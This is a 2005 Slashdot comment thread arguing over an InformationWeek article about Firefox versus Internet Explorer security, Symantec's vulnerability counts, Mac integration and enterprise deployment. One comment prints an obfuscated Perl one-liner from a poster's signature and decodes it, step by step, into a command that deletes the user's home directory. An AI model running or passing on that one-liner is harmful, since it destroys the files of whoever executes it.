Pros and Cons of Firefox Critically Evaluated?

A Dafa Disciple writes "Fred Langa of Information Week has written an article claiming to discuss the 'Pros and Cons of Firefox'. At first I was excited because I thought I was going to get to finally read an enlightening, in-depth article that critically examined the browser. I should have known better. Aside from the usual criticism of open source software, it contains a reference to a Symantec Internet Security Report which claims that more security vulnerabilities in the last six months of 2004 were found in Firefox than IE. I'll leave it to you to analyze Mr. Langa's opinion and scrutinize Symantec's study and reputation as a security software developer."
  • by Anonymous Coward on Monday April 18, 2005 @01:59PM (#12271599)
    Print version of the article [informationweek.com] fitting nicely onto one page.
  • by nacks1 ( 60717 ) on Monday April 18, 2005 @01:59PM (#12271607) Homepage Journal
    It's a little odd that this article would be posted without a note that Firefox 1.0.3 has just been released: http://www.mozilla.org/products/firefox/releases/1.0.3.html [mozilla.org]
  • by JLavezzo ( 161308 ) on Monday April 18, 2005 @02:01PM (#12271628) Homepage
    Please mod the parent down. He has put unlabeled malicious Perl code in his sig. Evidently as a prank or due to some sort of simple-mindedness.
  • by jimboisbored ( 871959 ) on Monday April 18, 2005 @02:01PM (#12271629)
    I used to run adaware with IE, I've run it once in a while since I switched to firefox and it'll occasionally find a cookie or two that doesn't bother me. With IE it'd find a couple hundred problems.
    Security vulnerabilities my ass.
    (yes I know spyware and security is different, but firefox sure is a lot less of a pain in the ass)
  • by ikkonoishi ( 674762 ) on Monday April 18, 2005 @02:03PM (#12271659) Journal
    They have that.

    It's called mozilla.

    Firefox is mozilla with most of the extra stuff besides the browser cut out.
  • Information week (Score:2, Informative)

    by 0kComputer ( 872064 ) on Monday April 18, 2005 @02:07PM (#12271713)
    There will always be reviews out there you don't like. First, this is information week, the WSJ for the pointy haired bosses, I would expect nothing less than a shitty review, actually, I'm glad he gave it a shitty review.

    Second, the guy looks like a total Asshat [wikipedia.org]. Look at his picture for christs sakes Fred Langa [cmpnet.com]
  • A couple of plugins you may want to consider are adblock and flashblock. The combination seems to work very well to prevent pesky popup problems.
  • Re:symantec (Score:2, Informative)

    by dlZ ( 798734 ) on Monday April 18, 2005 @02:09PM (#12271743) Journal
    My shop had a computer with a variant of Klez on it that an up to date copy of Norton's missed. Considering the age of Klez, any virus scanner should find it and prevent it without an issue. Norton was on the machine and running at time of infection, too.

    Only time I saw it miss something that major completely, but it killed the little hope I had left for the product.
  • Re:symantec (Score:5, Informative)

    by jim_v2000 ( 818799 ) on Monday April 18, 2005 @02:11PM (#12271774)
    I used to work for Symantec's tech support (used to--now Mike in India handles it) and the official line that we gave customers when they get a virus that Norton didn't detect was "Wait for the new definition file...it comes out next Wednesday." And when Norton wouldn't get rid of a virus, the line was "Norton Antivirus is a detection tool, not a removal tool." Which is total BS. If you read their website, the advertising for Norton AntiVirus says "Removes Viruses". That always troubled me, and I'm actually glad to be working elsewhere now.

    I personally run Grisoft's AVG for free, and Zone Alarm, and not only have I never had a virus/worm, they run a zillion times faster than Norton AntiVirus and Personal Firewall.

    Symantec makes bloatware that doesn't work well. Avoid it like the plague.
  • by As Seen On TV ( 857673 ) <asseen@gmail.com> on Monday April 18, 2005 @02:11PM (#12271779)
    Boy, do you have that backwards.

    The reason why everything looks the same on a Mac is that developers use the system frameworks to draw their on-screen controls. If a program has a control that looks wrong, as Firefox does, that's because the program actually is wrong. If it were using the correct frameworks to draw its controls, the controls would look right.

    This is a case where the fact that it looks wrong is a sign that it really is wrong.

    Now, as for Safari, it's not perfect. But then again, neither is Firefox. Our internal guys assure us that Safari is just as compatible as Firefox with well-formed Web pages, and degrades gracefully with badly-formed pages. And unlike Firefox, Safari is an actual Mac application, with support for Bonjour and Spotlight and (most importantly) the Keychain built right in.

    Firefox isn't a Mac application. It's a third-party application that was ported badly to the Mac.
  • Re:symantec (Score:5, Informative)

    by LnxAddct ( 679316 ) <sgk25@drexel.edu> on Monday April 18, 2005 @02:13PM (#12271805)
    This [secunia.com] says it all [secunia.com]. Not only has Firefox had 1/7 the vulnerabilities of IE, but those that it did have were patched quicker and were of less severity in most cases.
    Regards,
    Steve
  • by aweiland ( 237773 ) on Monday April 18, 2005 @02:14PM (#12271820)
    Prefix your search in the address bar with "google".

    i.e. to search google for foo bar try: google foo bar

    Firefox actually comes with a few more of these quick searches set up and it's easy to create your own (they are a special bookmark).
  • by mrklin ( 608689 ) <ken...lin@@@gmail...com> on Monday April 18, 2005 @02:14PM (#12271826)
  • US Cert (Score:3, Informative)

    by flokemon ( 578389 ) on Monday April 18, 2005 @02:16PM (#12271844) Homepage
    "In most cases in the more recent issues, you'll see the list of IE's vulnerabilities is shorter than those for Firefox, Mozilla, and the other alternate browsers. Likewise, with the more recent bulletins, you'll also see the list of Windows' vulnerabilities is actually much shorter than that for the other operating systems, even though Windows is far more widely installed."

    Where did he get this from??
    Latest 10 vulnerabilities on front page are all Windows.

    If you look at the bulletins like he does, you get a collection of vulnerabilities that have been patched.

    US-Cert Vulnerability Notes [cert.org] is where he should be searching if he wants a proper comparison.
    Firefox returns 11 results.
    I didn't count how many results Internet Explorer returned, but even if you don't count pre-2004 vulnerabilities, the number is still twice as high as it is for Firefox.
  • Symantec (Score:3, Informative)

    by eno2001 ( 527078 ) on Monday April 18, 2005 @02:19PM (#12271882) Homepage Journal
    In a word... sucks. Where I work, there was a trojan/worm that we were tracking and Symantec Corporate Edition wasn't finding it. After talking to them, it turns out they already knew about the problem but weren't going to be releasing any definition updates for mass deployment for a week. Instead they sent us a link to the early updates that we could apply manually. This stuff should be automated! Total suck in my opinion. Of course, I'm not the Windows admin here thankfully. That's a job I don't think I'd really want.
  • by Magycian ( 121354 ) on Monday April 18, 2005 @02:22PM (#12271926)
    Easy fix to this in win 2k and xp.

    Install Firefox. Install all of your plugins, themes, decorations, bangles, tools.

    Copy the Mozilla folder from your home folder application data. Application data is a hidden folder. A little digging will find it though.

    On new machine install firefox.
    Copy folder to the same place on new machine.

    Presto. Nothing lost.

    Can be used to create a custom look for your firefox across the network if you'd like. Force a backup of the folder for each user and their prefs all stay after a crash. Put the files on a USB key and carry your firefox with you. Thunderbird too.

    Works for me.
  • Re:More exploits? (Score:1, Informative)

    by suitepotato ( 863945 ) on Monday April 18, 2005 @02:23PM (#12271934)
    Microsoft doesn't practice security by obscurity, they don't practice security at all.

    Microsoft is still deeply locked into a corporate LAN mindset where all hosts are trusted, no one does anything shifty, and all users are business users. Meanwhile, they rule the civilian end-user market and the civies aren't remotely trustworthy, have too much free time on their hands, etc. The Internet is not a twenty seat LAN in Bismarck.

    On top of this, you have Microsoft's usual bad coding practices, lack of thorough testing inhouse, and this has gone on for years and only compounded itself over and over again. An entire operating system is designed and coded with development tools which are themselves far from bulletproof which were coded on the prior OS iteration which itself was far from bulletproof having been coded on the prior development tool which itself was...

    It's like standing between two opposed mirrors, except they're funhouse mirrors and you're sitting there trying to grind them accurate with a handful of abrasive, a sponge, and bucket of water and your boss keeps tossing them out and replacing them with new ones that are only slightly closer to true. "Leave it to the buyer to find the distortions!"

    They practice obfuscation, but it has nothing to do with security. They're practicing obscurity in development. Sort of like erasing pieces of your blueprints at random as you think you've built that section correctly.
  • No Yahoo Logo? (Score:5, Informative)

    by chill ( 34294 ) on Monday April 18, 2005 @02:24PM (#12271944) Journal
    I read the comment about Firefox not displaying the Yahoo logo and I couldn't believe it. Then, I popped over to Yahoo.com and sure enough, no logo.

    A quick check of the source told me what was going on. I recognized the yimg URL as one that I had *BLOCKED* images from long ago. Yahoo serves tons of graphics ads all over the Internet and I just blocked them all using Firefox's native ability to block images from a particular URL.

    It seems Yahoo serves their own graphics from the same server as their ads. Silly rabbit.

    So, it isn't a rendering bug with Firefox, it is a feature! And a damned useful one at that.

    feature + ignorance = bug? Sad.

    -Charles
  • by cloudmaster ( 10662 ) on Monday April 18, 2005 @02:26PM (#12271963) Homepage Journal
    Firefox's "install" consists of one directory. Copied to many machines. The configuration consists of one file stored in a user's profile. The distribution of both is easily automated without requiring the use of an MSI.

    Plugins, BTW, are also in that folder in the user's profile. You know, the one that's stored on a central server in your large network? Just set up firefox once on a test machine, and copy the firefox profile folder to each user's windows profile, then distribute the program files however you prefer to do that kind of thing.

    This can't be the first program with a non-MSI install method that an admin of a large network has encountered...
  • by daniel de graaf ( 771021 ) on Monday April 18, 2005 @02:28PM (#12271988) Homepage
    $??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{~" -;;s;;$_;see

    Adding whitespace

    ($?) ? s:;s:s;;$?:
    : s;;=]=>%-{<-|}<&|`{; ;
    y; -/:-@[-`{-};`-{~" -; ;

    s;;$_;see

    $? is equal to zero normally, so that's the same as
    s//=]=>%-{<-|}<&|`{/;
    y/ -\/:-@[-`{-}/`-{~" -/;
    s//$_/see

    The first statement => $_ = '=]=>%-{<-|}<&|`{';
    second translates $_ to 'system"rm -rf ~"'
    third: eval $_
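
The decoding walked through in the comment above can be reproduced without ever running the Perl. This Python sketch is an added example, not part of the original thread: it expands the two `y///` character lists, applies the mapping to the encoded string, and flags what the result would do. The function names and the indicator patterns are hypothetical; the encoded string and character lists are copied from the comment.

```python
import re

# Constructed sample: values copied from the comment's breakdown of the sig.
ENCODED = '=]=>%-{<-|}<&|`{'
TR_FROM = ' -/:-@[-`{-}'             # ';'-delimited form, no escapes needed
TR_FROM_ESCAPED = r' -\/:-@[-`{-}'   # '/'-delimited form, with '/' escaped
TR_TO = '`-{~" -'

def expand_tr_set(spec):
    """Expand a Perl tr/y character list (ranges, backslash escapes) to literals."""
    toks, i = [], 0
    while i < len(spec):
        if spec[i] == "\\" and i + 1 < len(spec):
            toks.append((spec[i + 1], True))   # escaped char is always literal
            i += 2
        else:
            toks.append((spec[i], False))
            i += 1
    out, j = [], 0
    while j < len(toks):
        # An unescaped '-' is a range operator only between two characters.
        if j + 2 < len(toks) and toks[j + 1] == ("-", False):
            lo, hi = ord(toks[j][0]), ord(toks[j + 2][0])
            if lo > hi:
                raise ValueError("invalid range %r-%r" % (toks[j][0], toks[j + 2][0]))
            out.extend(chr(c) for c in range(lo, hi + 1))
            j += 3
        else:
            out.append(toks[j][0])
            j += 1
    return "".join(out)

def perl_tr(text, from_spec, to_spec):
    """Apply tr/from/to/ (no modifiers) to text, purely as string translation."""
    src = expand_tr_set(from_spec)
    dst = expand_tr_set(to_spec) or src        # empty replacement list means identity
    if len(dst) < len(src):
        dst += dst[-1] * (len(src) - len(dst)) # Perl repeats the last character
    table = {}
    for s, d in zip(src, dst):
        table.setdefault(ord(s), d)            # first mapping for a char wins
    return text.translate(table)

# Illustrative indicators for triaging the decoded text (assumed, not exhaustive).
RISKY = {
    "shell-exec": re.compile(r"\b(system|exec)\b|`"),
    "recursive-delete": re.compile(r"\brm\s+-\w*r\w*f|\brm\s+-\w*f\w*r"),
    "home-dir": re.compile(r"~|\$HOME"),
}

def triage(decoded):
    """Return the sorted names of the indicators that match the decoded text."""
    return sorted(name for name, rx in RISKY.items() if rx.search(decoded))

if __name__ == "__main__":
    decoded = perl_tr(ENCODED, TR_FROM, TR_TO)
    print("decoded:", decoded)
    print("flags  :", triage(decoded))
```
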
  • by cuijian ( 110696 ) * on Monday April 18, 2005 @02:32PM (#12272036)
    Compare IE and Firefox security with Safari:
    http://secunia.com/product/1543/ [secunia.com]

    - Open source engine
    - Less vulnerabilities discovered
    - ZERO Unpatched Vulnerabilities
  • by edmicman ( 830206 ) on Monday April 18, 2005 @02:32PM (#12272041) Homepage Journal
    I've never understood the argument that the more people that use firefox (or linux for that matter), then hackers will begin to target those users, too. Isn't the point of OSS that ANYBODY can see the source code? If a vulnerability is found, why would anyone think it will stay there?!? It will be reviewed and fixed by any number of people in a timely manner. I think that's the core of what makes firefox and the like "more secure". What am I missing here?
  • by Frank Palermo ( 846883 ) on Monday April 18, 2005 @02:36PM (#12272092)
    I might mention that Kevin Gerich's widget set [kmgerich.com] makes Firefox's HTML controls look much more presentable on Mac, in my opinion. It's not quite the same as having native Aqua widgets, but it's a start. Granted they aren't bundled with the application by default, nor do they solve any of the other OS integration issues you mentioned.

    That having been said, I agree with the assessment that Firefox for Mac has a lot of catch-up to do to match Safari in terms of aesthetics. It's one of the biggest cons of choosing Firefox on the Mac platform. Safari, as Apple's own in-house effort, gets a level of fit-and-finish with the rest of the OS that third-party developers can have a tough time matching.

    On the other hand, the biggest pro for Firefox on Mac (in my opinion) is the expandability. Safari doesn't have Adblock, BugMeNot, or any of my other favorite extensions. Even Camino doesn't support them. So in my case, I choose expandability over aesthetics and use Firefox as my default browser on Mac.

    Ideally though, it would be possible to have both. Maybe in time and with further Firefox development.

    -Frank
  • by gosand ( 234100 ) on Monday April 18, 2005 @02:41PM (#12272150)
    "So, I wouldn't be surprised if more new security problems were located in Firefox in the recent past than in IE during the same time period. That doesn't imply that there are fewer problems in IE than in Firefox, just that fewer were found in a given time period."

    Exactly. Not that vulnerability counts aren't important, but you have to dig for more information. The article said there were 13 reported for IE and 21 for Firefox in the same time period. OK. How many of those have been fixed in IE and in Firefox? What was the breakdown on severity? What platforms were affected?

    If the author didn't want to go into all this detail to give a more accurate picture, he shouldn't have just thrown out those numbers. I won't go as far as to say they are meaningless, but they don't paint an accurate picture.

  • by Professional Slacker ( 761130 ) on Monday April 18, 2005 @02:44PM (#12272197) Homepage
    This is a great idea, it's what I use, but you missed a detail. As of Firefox 1.0 all the paths to extensions, themes, etc. that are recorded in the chrome.rdf file are all full paths (c:\docs & settings\$user_name\app_data\firefox\profile\$profilename\????.slt\$filename). This is all well and good if the user name is the same on both machines, but if the user names are different the paths won't be correct, no go. BUT with a little bit of mucking around in your profile's chrome.rdf you can set everything up to be relative to your profile. To get relative paths working, open up chrome.rdf in your text editor of choice and replace instances of "c:\docs & settings\$user_name\app_data\firefox\profile\$profilename\????.slt\$filename" with "chrome://$filename". And now you've got a firefox profile that will run anywhere.
  • corrected link (Score:2, Informative)

    by Anonymous Coward on Monday April 18, 2005 @02:45PM (#12272208)
    You suck at teh internet.

    Here's the same link again, except that it's pointing to the correct place...

    http://www.informationweek.com/shared/printableArticle.jhtml?articleID=160900911 [informationweek.com]

  • formhistory.dat (Score:3, Informative)

    by krygny ( 473134 ) on Monday April 18, 2005 @02:51PM (#12272285)

    formhistory.dat is encrypted.
  • by khasim ( 1285 ) <brandioch.conner@gmail.com> on Monday April 18, 2005 @02:52PM (#12272294)
    "Maybe Firefox is a more stable, more secure browser than IE, but everything is gonna have its flaws."
    That depends upon how you define "flaws".
    "And the more people use it, the more it's gonna get targeted."
    "Targeted" doesn't really matter.

    My Linux box is frequently targeted, but it's all Windows exploits so it doesn't matter.
    "It's nice to give Microsoft the shaft, sure, but the more Firefox creeps into the mainstream, the more it's gonna inherently open itself up to exploits."
    Ah, so there is no such thing as "security" then.

    Just "marketshare".

    No matter how many software experts put in how much effort, the end result will spontaneously generate "flaws" as more people use it.

    By that "logic", there is no difference between a browser ("A") written by a team of experts who focused on security ... and a browser ("B") written by a 1st year student who cared nothing about security.

    Flaws do NOT appear just because more people use the software.

    Code is not magic.
  • Not quite (Score:1, Informative)

    by Anonymous Coward on Monday April 18, 2005 @03:02PM (#12272441)
    "security by obscurity provides a fairly good amount of security assuming you can keep your code secure"

    That's not quite right. It assumes that you can keep it secure (as you say), and it assumes that the workings of the program will not be susceptible to black-box reverse engineering.

    IE appears to have hidden the code pretty well. But it has proven very susceptible to reverse engineering.
  • Re:No Yahoo Logo? (Score:2, Informative)

    by dantheman82 ( 765429 ) on Monday April 18, 2005 @03:26PM (#12272723) Homepage
    I had the same thing - no Yahoo images. This after I went to Ebay's page and also have no Ebay graphics. Both sites unfortunately use Ying (Yahoo) or Doubleclick and other services (Ebay) to display their graphics.

    Yeah, my Adblock is really tight and unforgiving, so I really don't care about a missing picture here or there.

    Which is what I find so great about Google...their ads are (a) not offensive since they are not text-based and (b) useful because they text-based and relevant.
  • by I'm Don Giovanni ( 598558 ) on Monday April 18, 2005 @03:31PM (#12272801)
    I see many here attacking Symantec, but if you read the article, US-CERT is also cited as a source questioning the "Firefox is more secure" mantra.
    "US-CERT (United States Computer Emergency Readiness Team), a partnership between the Department of Homeland Security and the public and private sectors, impartially tracks all manner of security issues in operating systems and major applications, such as browsers. US-CERT issues a bulletin every week, outlining the current crop of problem areas. You can access all past and current bulletins here [us-cert.gov]; I urge you to take a moment, click on over to their site, open several bulletins at random, and scroll down the page. In most cases in the more recent issues, you'll see the list of IE's vulnerabilities is shorter than those for Firefox, Mozilla, and the other alternate browsers. Likewise, with the more recent bulletins, you'll also see the list of Windows' vulnerabilities is actually much shorter than that for the other operating systems, even though Windows is far more widely installed."
    So, making yourselves feel better by attacking the messenger Symantec is foolhardy because there are other messengers that agree with them.
  • by cloudmaster ( 10662 ) on Monday April 18, 2005 @04:01PM (#12273233) Homepage Journal
    If only there was a directory on Windows machines of the form

    C:\Documents and Settings\All Users\Desktop :)
  • by neithian ( 814705 ) <jbarget.gmail@com> on Monday April 18, 2005 @04:35PM (#12273755)
    I assume ListZilla [roachfiend.com] does the same thing? Perhaps better?
  • by Anonymous Coward on Monday April 18, 2005 @05:30PM (#12274510)
    Could you please give me a link to the IE 6 .msi package Microsoft has produced?

    Guess what, there isn't one. If you contact MS support, they can send you a very crappy MSI wrapper for the IE 6 setup executable. Other than that, you can make your own or find one somebody has repackaged. If you do a quick search, you can find Firefox .msi packages pretty quickly.

    I found deploying Firefox to a couple thousand machines as easy as deploying IE 6 to the same number of Windows 2000 machines. The IEAK didn't do anything I needed that I couldn't do with FireFox by tweaking a few plain text files.

    IE does have configuration setting available through group policy, but you can add custom adm files. See:
    http://sourceforge.net/projects/firefoxadm

    I was working on my own adm templates so I haven't tried these yet, but if you take a look, there are probably more out there.

  • by dolphinling ( 720774 ) on Monday April 18, 2005 @05:52PM (#12274767) Homepage Journal

    "The problem lies in that not all users know anything beyond point and click. For these users, getting to a site that says "You will need the flash plug in to view this site correctly" is a deal breaker."

    Installing Flash is point-and-click. Yes, I just tried it. I'm even on Linux, and it's still point and click.

    "Even more so when all they see is just some innocuous little image that doesn't explain to them why it isn't working. (Ala the little jigsaw piece)"

    It's a little puzzle piece that says "Click here to download plugin". After that, everything's automated. You just have to click next a few times and agree to a (Macromedia) license. You don't even have to restart the browser.

    If you have any suggestions on how it could be improved, please report them to bugzilla.mozilla.org, or even just post here in reply to me or email me, and I'll do it for you (assuming I agree they'd improve it).

    "I wholeheartedly agree that firefox needs to have two rollouts. One with and without extensions."

    This introduces huge licensing problems. If mozilla.org were to bundle Flash, for example, they would first have to get Macromedia's approval, and even then it would cause other problems, e.g. including it in Debian, which would most likely reject it because of the non-free license.

    It also puts a lot more stress on the developers and release-candidate testers, as they have to do double the work.

    "I currently sit on a standards committee for the school district I work in and we shot down firefox, even though many of the admins use it on their machines themselves"

    That's very unfortunate :-(

    "No Active X support (many of our online applications use active X)"

    You should fix your applications. You'll need to eventually, anyway, Firefox is just a good incentive to.

    Most people consider the lack of ActiveX a good thing, as it strengthens security considerably.

    "Not as user friendly as other browsers (ease of use and clarity issues)."

    Most people would take the opposite position here: Firefox has a much better user interface than other browsers and especially Internet Explorer. If you have any specific issues, again, either report them to bugzilla.mozilla.org or send them to me and I'll pass them along to there.

    "Lack of a real centralized support center (The forums are a rich resource..if you have time to run searches or wait for someone to answer your post, which in a real world environment, is not conducive)"

    Though most people I've talked to think the support you can get in those forums is better and faster than what you get from most corporate support centers, I can understand why you might need this in a school or company. I believe there are one or perhaps even several third-party companies starting up to provide equivalent support, but I can't be certain off the top of my head. If this is a strong issue, you may want to look into it.

    "Potential for abuse by students of all age ranges (The tabbed browsing is an exceptional idea! however, most teachers are too used to window browsing and wouldn't even notice the extra three or four tabs that are in the background hiding god knows what kind of sites from her view.)"

    This I know is a real issue, because I've used it myself in school ;-) I'd point out, though, that there are plenty of other ways that students can hide what they're doing, and I've watched friends play games for hours without the teacher knowing it, even in Internet Explorer.

    "Every time we tried to see if there were possible solutions, we were either met with hostility on the forums for daring to suggest that firefox was lacking in any area or we got silence."

    That's unfortunate. I'm sorry the people that found you weren't as helpful.

  • by dolphinling ( 720774 ) on Monday April 18, 2005 @05:57PM (#12274812) Homepage Journal

    This hasn't been true since before 1.0. Now there's a bar at the top of the screen, similar to the one for popups. Much less intrusive.
